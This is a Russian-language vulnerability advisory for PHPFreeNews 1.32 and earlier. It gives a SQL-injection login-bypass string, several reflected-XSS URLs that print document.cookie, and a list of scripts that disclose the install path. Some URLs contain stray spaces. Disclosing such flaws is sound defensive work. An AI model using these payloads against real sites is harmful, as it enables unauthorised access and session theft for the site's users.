Программа: PHPFreeNews 1.32 и более ранние версии 

Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Удаленный пользователь может послать специально сформированный запрос приложению и выполнить произвольные SQL команды в базе данных. 

Пример: 

login: Admin
password: ‘) or isnull(1/0) or (‘a’=’a

2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 

Примеры: 

http://[target]/[path]/inc/Footer.php?ScriptVersion= < script>alert(document.cookie)</script>

http://[target]/[path]/inc/ScriptFunctions.php? FullNews DisplayMode=3& NewsDir=»)}//—></script>
<script>alert(document.cookie)</script>

http://[target]/[path]/inc/ScriptFunctions.php? EnableRatings=1&NewsDir=» )}//—></script><script>
alert(document.cookie)</script>

http://[target]/[path]/inc/ScriptFunctions.php? EnableComments=1&NewsDir=» )}//—></script><script>
alert(document.cookie)</script>

http://[target]/[path]/inc/ScriptFunctions.php? FullNewsDisplayMode=3&PopupWidth=»)}//—></script>
<script>alert(document.cookie)</script>

http://[target]/[path]/inc/Script Functions.php? FullNewsDisplayMode=3&PopupHeight=»)}//—></script>
<script>alert(document.cookie)</script>

http://[target]/[path]/inc/ScriptFunctions.php? EnableComments=1&PopupWidth=»)}//—></script><script>
alert(document.cookie)</script>

http://[target]/[path]/inc/ScriptFunctions.php? EnableComments=1&PopupHeight=»)}//—></script>
<script>alert(document.cookie)</script>

3. Удаленный пользователь может непосредственно обратится к сценарию и получить данные об установочной директории приложения на системе. Уязвимые сценарии: 

http://[target]/[path]/inc/ArchiveOldNews.php
http://[target]/[path]/inc/Categori es.php
http://[target]/[path]/inc/CheckLogout.php
http://[target]/[path]/inc/CommentsApproval.php
http://[target]/[path]/inc/Images.php
http://[target]/[path]/inc/New sList.php
http://[target]/[path]/inc/Password.php
http://[target]/[path]/inc/Post.php
http://[target]/[path]/inc/PostsApproval.php
http://[target]/[path]/inc/PurgeOld News.php
http://[target]/[path]/inc/SetSticky.php
http://[target]/[path]/inc/SetVisible.php
http://[target]/[path]/inc/Statistics.php
http://[target]/[path]/inc/Templ ate.php
http://[target]/[path]/inc/UserDefinedCodes.php
http://[target]/[path]/inc/Users.php



Оставить мнение